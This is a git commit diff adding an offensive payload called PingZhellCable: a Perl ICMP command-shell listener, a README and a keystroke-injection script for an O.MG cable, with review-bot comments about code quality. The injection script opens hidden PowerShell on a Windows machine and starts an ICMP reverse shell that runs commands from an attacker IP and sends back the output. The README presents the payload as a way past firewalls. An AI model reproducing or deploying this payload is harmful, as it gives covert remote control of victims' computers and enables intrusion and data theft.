parent
2c7e3869be
commit
282f703a81
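--- /dev/null
+++ b/PATH_NOT_SHOWN/PingZhellClient.pl
@@ -0,0 +1,74 @@
+#!/usr/bin/env perl
+#
+# icmpsh - simple icmp command shell
+# Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program. If not, see <http://www.gnu.org/licenses/>.
+#
+# Modified by 0iphor13 for PingZhellCable
+#
+#
+#
+#
+
+
+use strict;
+use IO::Socket;
+use NetPacket::IP;
+use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);
+use Net::RawIP;
+use Fcntl;
+
+print "Loading PingZhellCable...\n";
+
+# create raw socket
+my $sock = IO::Socket::INET->new(
+Proto => "ICMP",
+Type => SOCK_RAW,
+Blocking => 1) or die "$!";
+
+# set stdin to non-blocking
+fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!";
+
+
+#Unnecessary print output - just for fun
+sleep(2);
+print ". .\n";
+sleep(1);
+print ". . .";
+sleep(1);
+print ". . . .";
+sleep(2);
+print "PingZhellCable client ready!\n";
+my $input = '';
+while(1) {
+if ($sock->recv(my $buffer, 4096, 0)) {
+my $ip = NetPacket::IP->decode($buffer);
+my $icmp = NetPacket::ICMP->decode($ip->{data});
+if ($icmp->{type} == ICMP_ECHO) {
+# get identifier and sequencenumber
+my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data});
+
+# write data to stdout and read from stdin
+print $data;
+$input = <STDIN>;
+
+# compile and send response
+$icmp->{type} = ICMP_ECHOREPLY;
+$icmp->{data} = pack("SSa*", $ident, $seq, $input);
+my $raw = $icmp->encode();
+my $addr = sockaddr_in(0, inet_aton($ip->{src_ip}));
+$sock->send($raw, 0, $addr) or die "$!\n";
+}
+}
+}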
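Review bot: `use Net::RawIP;` is loaded but no symbol from it is used anywhere in the file — every call here comes from IO::Socket, NetPacket::IP, NetPacket::ICMP and Fcntl — and the README added in this same commit does not list it as a dependency, so the script dies at startup on any host without that module; dropping the line fixes both problems. The file has `use strict;` but no `use warnings;`, which would have surfaced the next point. STDIN is made non-blocking with `fcntl`, so `$input = <STDIN>;` returns undef whenever no line is pending, and that undef is handed straight to `pack("SSa*", ...)`; `$input = <STDIN> // '';` makes the intended empty-reply behaviour explicit. The README also says the client listens for packets "from a specific host", but nothing in the loop compares `$ip->{src_ip}` to anything and `print $data;` writes whatever bytes arrive to the terminal unfiltered, so either the README or a comment at the top of the loop should state which behaviour is intended.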
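--- /dev/null
+++ b/PATH_NOT_SHOWN/README.md
@@ -0,0 +1,43 @@
+**Title: PingZhellCable**
+
+Author: 0iphor13
+OS: Windows<br>
+Version: 1.0<br>
+Requirements: OMG Firmware v.2.5 or higher</p>
+
+**What is PingZhellCable?**
+#
+*Imagine a scenario in which communication to and from the server is protected and filtered by a firewall and does not allow TCP shell communication to take place on any listening port (both reverse and bind TCP connection).*
+*But many environments allow ping requests to be sent and received. Ping requests work on the ICMP protocol.*
+*ICMP stands for Internet Control Message Protocol; it is used by network devices’ query and error messages. ICMP differs from the widely used TCP and UDP protocols because ICMP is not used for transferring data between network devices.*
+*When a device wants to test connectivity to another device, it uses the PING tool (ICMP communication) to send an ECHO REQUEST and waits for an ECHO RESPONSE.*
+*The client ICMP agent (PingZhellClient.pl) listens for ICMP packets from a specific host and uses the data in the packet for command execution.*
+*The server ICMP Agent (PingZhellClient.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (PingZhellCable input) and sends it commands to execute.*
+#
+There you go, a reverse shell without the usage of ports.
+
+**Instruction:**
+
+Upload PingZhellClient.pl onto your attacking machine.
+Install dependencies, if needed:
+- IO::Socket
+- NetPacket::IP
+- NetPacket::ICMP
+
+Disable ICMP replies by the OS:
+`sysctl -w net.ipv4.icmp_echo_ignore_all=1`
+
+Start the client -> `perl PingZhellClient.pl`
+![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/remote_access/PingZhellCable/setup.png)
+#
+<p>!!!Insert the IP of your attacking machine into the payload variable $IP!!!<br>
+#
+<p>Plug in your OMG device.<br>
+Achieve reverse shell.<br>
+run away <3</p>
+
+
+Credit for code and ideas:
+- bdamele
+- Nikhil Mittal
+- krabelize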
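--- /dev/null
+++ b/PATH_NOT_SHOWN/payload.txt
@@ -0,0 +1,24 @@
+REM PingZhellCable
+REM Version 1.1
+REM OS: Windows
+REM Author: 0iphor13
+REM Requirements: OMG Firmware v.2.5 or higher
+
+REM Getting remote access via ICMP
+
+DELAY 500
+DUCKY_LANG de
+DELAY 1500
+GUI r
+DELAY 500
+STRING powershell -NoP -NonI -w hidden
+DELAY 500
+ENTER
+DELAY 500
+STRING $IP = 'Attacker-IP';
+DELAY 250
+STRING $Delay=5;$BufferSize=128;$ICMPCable=New-Object System.Net.NetworkInformation.Ping;$PingOMG=New-Object System.Net.NetworkInformation.PingOptions;$PingOMG.DontFragment = $True;$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('O.MG@PS '+(gl).Path+'> ');$ICMPCable.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingOMG) | Out-Null;while ($true){$NeverGonnaGiveYouUp=([text.encoding]::ASCII).GetBytes('');$reply=$ICMPCable.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingOMG);if ($reply.Buffer){$response=([text.encoding]::ASCII).GetString($reply.Buffer);$result=(IeX -Command $response 2>&1 | Out-String );$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result);$index=[math]::floor($NeverGonnaGiveYouUp.length/$BufferSize);$i = 0;
+DELAY 250
+STRING if($NeverGonnaGiveYouUp.length -gt $BufferSize){while ($i -lt $index ){$NGGYU2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)];$ICMPCable.Send($IP,60 * 10000, $NGGYU2, $PingOMG) | Out-Null;$i +=1;};$remainingindex=$NeverGonnaGiveYouUp.Length % $BufferSize;if($remainingindex -ne 0){$NGGYU2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)];$ICMPCable.Send($IP,60 * 10000, $NGGYU2, $PingOMG) | Out-Null}}else{$ICMPCable.Send($IP,60 * 10000, $NeverGonnaGiveYouUp, $PingOMG) | Out-Null};$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nO.MG@PS " + (pwd).Path + '> ');$ICMPCable.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingOMG) | Out-Null}else{Start-Sleep -Seconds $Delay}}
+DELAY 250
+ENTER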
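Review bot: `REM Version 1.1` in the header disagrees with the README added in the same commit, which states `Version: 1.0<br>`; one of the two should be corrected so the payload header and its documentation agree. `DUCKY_LANG de` pins a German keyboard layout without any comment or README mention, which is the kind of environment-specific setting that deserves a `REM` line beside it (for example `REM Keyboard layout of the target; change if not German`) so readers do not mistake it for a generic default. The README's dependency list also omits the Net::RawIP module that the Perl client loads, so the two files should be reconciled in the same change.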
Binary file not shown.